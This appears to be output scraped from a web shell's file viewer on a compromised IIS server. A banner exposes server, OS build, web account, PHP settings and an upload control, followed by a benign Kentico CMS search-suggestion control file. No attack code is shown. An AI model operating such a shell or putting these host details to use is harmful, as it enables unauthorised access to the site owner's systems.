HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/MBoogaard/oosting-horseriding.com/CMS/CMSWebParts/Search/DidYouMean.ascx
<%@ Control Language="C#" AutoEventWireup="true"
    Inherits="CMSWebParts_Search_DidYouMean"  CodeFile="~/CMSWebParts/Search/DidYouMean.ascx.cs" %>
<asp:PlaceHolder ID="plcDidYouMean" runat="server" EnableViewState="false">
    <div class="DidYouMean">
        <span class="DidYouText">
            <asp:Literal runat="server" ID="ltrText" />
        </span>
        <asp:HyperLink ID="lnkSearch" runat="server">
            <span class="DidYouValue">
                <asp:Literal ID="ltlLinkText" runat="server" />
            </span>
        </asp:HyperLink>
    </div>
</asp:PlaceHolder>